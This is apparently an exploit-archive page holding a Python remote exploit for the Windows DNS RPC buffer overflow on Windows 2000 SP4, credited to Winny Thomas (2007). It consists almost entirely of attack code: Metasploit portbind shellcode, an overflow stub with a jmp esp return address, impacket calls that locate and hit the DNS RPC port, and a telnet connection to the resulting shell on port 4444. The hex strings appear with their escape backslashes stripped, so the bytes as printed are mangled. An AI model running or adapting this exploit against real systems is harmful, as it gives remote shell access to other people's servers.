MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)
# Published : 2007-04-15
# Author : Winny Thomas
# Previous Title : MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2
# Next Title : XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit
#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in http://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid

#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode  = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
shellcode += "x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9"
shellcode += "x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56"
shellcode += "x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22"
shellcode += "xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30"
shellcode += "x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81"
shellcode += "x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42"
shellcode += "xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22"
shellcode += "xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9"
shellcode += "x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79"
shellcode += "x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab"
shellcode += "xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa"
shellcode += "xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48"
shellcode += "x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1"
shellcode += "x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0"
shellcode += "xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe"
shellcode += "x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9"
shellcode += "xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84"
shellcode += "x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56"
shellcode += "x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8"
shellcode += "x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79"
shellcode += "x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6"
shellcode += "xbaxb5x60x56x39x4axb6xa9"

# Stub sections taken from metasploit 
stub  = 'xd2x5fxabxdbx04x00x00x00x00x00x00x00x04x00x00x00'
stub += 'x70x00x00x00x00x00x00x00x1fx38x8ax9fx12x05x00x00'
stub += 'x00x00x00x00x12x05x00x00'
stub += '\A' * 465
# At the time of overflow ESP points into our buffer which has each char 
# prepended by a '' and our shellcode code is about 24+ bytes away from 
# where EDX points
stub += '\x80\x62\xE1\x77'#Address of jmp esp from user32.dll
# The following B's which in assembly translates to 'inc EDX' increments
# about 31 times EDX so that it points into our shellcode 
stub += '\B' * 43 
# Translates to 'jmp EDX'
stub += '\xff\xe2'
stub += '\A' * 134 
stub += 'x00x00x00x00x76xcfx80xfdx03x00x00x00x00x00x00x00'
stub += 'x03x00x00x00x47x00x00x00'
stub += shellcode

# Code ripped from core security document on impacket
# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf 
# Not a neat way to discover a dynamic port :-)
def DiscoverDNSport(target):
	trans = transport.SMBTransport(target, 139, 'epmapper')
	trans.connect()
	dce = dcerpc.DCERPC_v5(trans)
	dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
	pm = epm.DCERPCEpm(dce)
	handle = 'x00'*20
	while 1:
		dump = pm.portmap_dump(handle)
		if not dump.get_entries_num():
			break
		handle = dump.get_handle()
		entry = dump.get_entry().get_entry()
		if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
			port = entry.get_string_binding().split('[')[1][:-1]
			return int(port)

	print '[-] Could not locate DNS port; Target might not be running DNS'

def ExploitDNS(target, port):
	trans = transport.TCPTransport(target, port)
	trans.connect()
	dce = dcerpc.DCERPC_v5(trans)
	dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0')))	
	
	dce.call(0x01, stub)

def ConnectRemoteShell(target):
	connect = "/usr/bin/telnet " + target + " 4444"
	os.system(connect)

if __name__ == '__main__':
	try:
		target = sys.argv[1]
	except IndexError:
		print 'Usage: %s <target ip address>' % sys.argv[0]
		sys.exit(-1)

	print '[+] Locating DNS RPC port'
	port = DiscoverDNSport(target)
	print '[+] Located DNS RPC service on TCP port: %d' % port
	ExploitDNS(target, port)
	print '[+] Exploit sent. Connecting to shell in 3 seconds'
	time.sleep(3)
	ConnectRemoteShell(target)	

# www.Syue.com [2007-04-15]